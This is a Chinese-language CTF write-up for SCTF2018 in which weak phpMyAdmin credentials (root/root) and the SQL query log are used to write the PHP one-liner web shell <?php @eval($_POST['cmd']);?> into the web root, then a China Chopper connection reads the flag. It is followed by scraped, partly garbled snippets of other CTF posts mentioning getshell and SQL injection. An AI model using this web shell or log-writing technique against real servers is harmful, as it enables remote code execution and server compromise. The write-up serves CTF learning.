Writeup | SCTF2018 |CTF 比賽 |By Jas502n
__________WEB_____________
0x01 easiest web – phpMyAdmin
Ps: 思路弱口令(root / root)登陸phpmyadmin,利用日誌功能進行getshell
送分題,輕松一下
http://47.97.214.247:20001/phpmyadmin
Alternate address:
http://218.245.4.98:20000/phpmyadmin
開啟日誌,寫入一句話
查詢sql語句
<?php @eval($_POST[‘cmd‘]);?>
日誌寫入到網站路徑下的dasdasdas.php文件
然後就getshell
http://218.245.4.98:20000/dasdasdad.php
密碼:cmd
菜刀連接
在C盤發現flag
sctf{31cf2213cc49605a30f07395d6e5b9c4}
0x02 新的建議板
Writeup | SCTF2018 |CTF 比賽 |By Jas502n
相關推薦
Writeup | SCTF2018 |CTF 比賽 |By Jas502n
lte inf 輕松 php @ dmi 弱口令 IE 利用 img __________WEB_____________ 0x01 easiest web – phpMyAdmin Ps: 思路弱口令(root / root)登陸phpmyadmin,利用日誌功能進行ge
Writeup | 2017 ISG CTF 比賽
審計 ssr 目錄 解密 自己 div action png 2-2 2017 ISG比賽_By Jas502n 0x01 簽到題 去QQ群公告看下 4953477b64343164386364393866303062323034653938303039393
i春秋 百度杯”CTF比賽(二月場) Misc&&web題解 By Assassin
爆破-1 開啟題目我們直接就看到原始碼,加上註釋如下 <?php include "flag.php"; //包含flag.php這個檔案 $a = @$_REQUEST['hello']; //$a
ctf比賽linux文件監控和恢復shell
shell then bash ctf tdi don 文件恢復 ech 目錄 之前參加ctf比賽時候臨時寫的,有很多不足,不過可以用,就貼出來分享給大家,希望對大家有幫助。 腳本一:記錄當前目錄情況 #!/bin/bashfunction getdir(){ for
“百度杯”CTF比賽 九月場_YeserCMS
AD query live username 發現 data tps 報錯 註入 題目在i春秋ctf大本營 題目的提示並沒有什麽卵用,打開鏈接發現其實是easycms,百度可以查到許多通用漏洞 這裏我利用的是無限報錯註入 訪問url/celive/live/header
“百度杯”CTF比賽 九月場_123(文件備份,爆破,上傳)
lag 註釋 alt png 一個 頁面 圖片 比賽 src 題目在i春秋ctf訓練營 翻看源碼,發現提示: 打開user.php,頁面一片空白,參考大佬的博客才知道可能會存在user.php.bak的備份文件,下載該文件可以得到用戶名列表 拿去burp爆破:
“百度杯”CTF比賽 2017 二月場(Misc Web)
函數 ext time() info erro 一段 hello span clas 爆破-1: 打開鏈接,是502 我直接在後面加個變量傳參數:?a=1 出了一段代碼 var_dump()函數中,用了$$a,可能用了超全局變量GLOBALS 給hello參數
“百度杯”CTF比賽 九月場_Test(海洋cms前臺getshell)
OS 技術分享 href 連接 post ive s/4 九月 hive 題目在i春秋ctf訓練營 又是一道cms的通用漏洞的題,直接去百度查看通用漏洞 這裏我使用的是以下這個漏洞: 海洋CMS V6.28代碼執行0day 按照給出的payload,直接訪問url+/sea
“百度杯”CTF比賽 十月場_Login
array flag -s mysql base ssi ech ken pan 題目在i春秋ctf大本營 打開頁面是兩個登錄框,首先判斷是不是註入 嘗試了各種語句後,發現登錄界面似乎並不存在註入 查看網頁源代碼,給出了一個賬號 用帳密登陸後,跳轉到到member.php
2018小訓—“百度杯”CTF比賽_九月場_SQLi
sci ase dex https lock concat 圖片 數據庫 ack 題目源: i春秋CTF大本營 小工具: Burp Suite(抓包神器) 思路點用黃色加粗標記,操作點用綠色加粗標記 解題的流程: 1.點進去一片空白習慣性,看源碼。<!--
i春秋——“百度杯”CTF比賽 十月場——Login
cat dex this HERE session wake ima base64 query 根據頁面源碼提示的 test1 test1 登錄 刷新此頁面並抓包,有個show=0值得關註 在發送的包的header中加一句show:1,即可得到member.ph
i春秋——“百度杯”CTF比賽 九月場——123(Apache解析pht,phtml,php3等 php別名)
正則 並不是 src 內容 img 直接 ctf inf bubuko 網頁源碼提示用戶信息在user.php中,直接訪問是不會有顯示的,於是查找相應的備份文件,vim交換文件等,最後發現/user.php.bak 用burp采用如下配置開始爆破 最後爆破
i春秋——“百度杯”CTF比賽 九月場——Test(海洋cms / seacms 任意代碼執行漏洞)
jpg com ctf比賽 ima 命令 () nbsp 上傳 菜刀 打開發現是海洋cms,那就搜索相關漏洞 找到一篇介紹海洋cms的命令執行漏洞的文章:https://www.jianshu.com/p/ebf156afda49 直接利用其中給出的poc /sea
i春秋 “百度杯”CTF比賽 十月場 web題 Backdoor
解釋 而不是 tro base href alt backdoor pri eat 0x00: 打開題目,題目中告訴我們這題是文件泄露。 0x01: 通過掃描目錄,發現可以掃到的有3個文件 index.php flag.php robots.txt 但是瀏覽flag.
i春秋 “百度杯”CTF比賽 十月場Not Found
https://www.ichunqiu.com/battalion?t=1&r=0 這道題目考察的是HTTP的幾種請求方法,當我們使用GET方法請求網站根目錄時,會出現404錯誤,在返回頁面中出現X-Method欄位,值為haha,其實這就是在提示我們考慮請求方法,HTTP
i春秋 “百度杯”CTF比賽 十月場 Exec
https://www.ichunqiu.com/battalion?t=1&r=0 進入題目連結,是一隻貓咪 檢視網頁原始碼: <html> <head> <title>blind cmd exec</title> &
i春秋 “百度杯”CTF比賽 十月場 Vld
https://www.ichunqiu.com/battalion?t=1&r=0 opcode中的 BEGIN_SILENCE就是@,不顯示報錯資訊 猜測opcode中的 EXT_STMT就是;,表示一個語句的結束 opcode中的FETCH_R意思是從某個變數中取出
【鹹魚·心聲】CTF比賽看到了自己的不堪一擊
林大計算機鹹魚一枚,愛好計算機,今日是第一次寫計算機方面的部落格。雖然可能內容簡單甚至還有錯誤,但是希望能夠通過此記錄自己的成長軌跡。或許這就是我走向成熟的足跡。 ——《淺談氣泡排序》 以上文字摘錄自我的第一篇部落格,對於氣泡排序的一些理解,嘗試寫了一下部落格。 內容,可能
“百度杯”CTF比賽 九月場SQLi ---------mozhe
題目連結:https://www.ichunqiu.com/battalion 點選進去,檢視原始碼 發現login.php?id=1 一般是存在sql注入的,可是我測試了好幾遍,sqlmap也跑過了,也沒發現啥 沒辦法,查看了官方wp,說是存在index
i春秋 “百度杯”CTF比賽 九月場 再見CMS
這道題剛做的時候是沒有頭緒的,看了一眼writeup,得知要通過網站下方的備案記錄來查詢除網站相關資訊,並進而得知該網站所使用的的cms,但是我照著做的時候卻查不出來結果,ICP/IP官網返回說無匹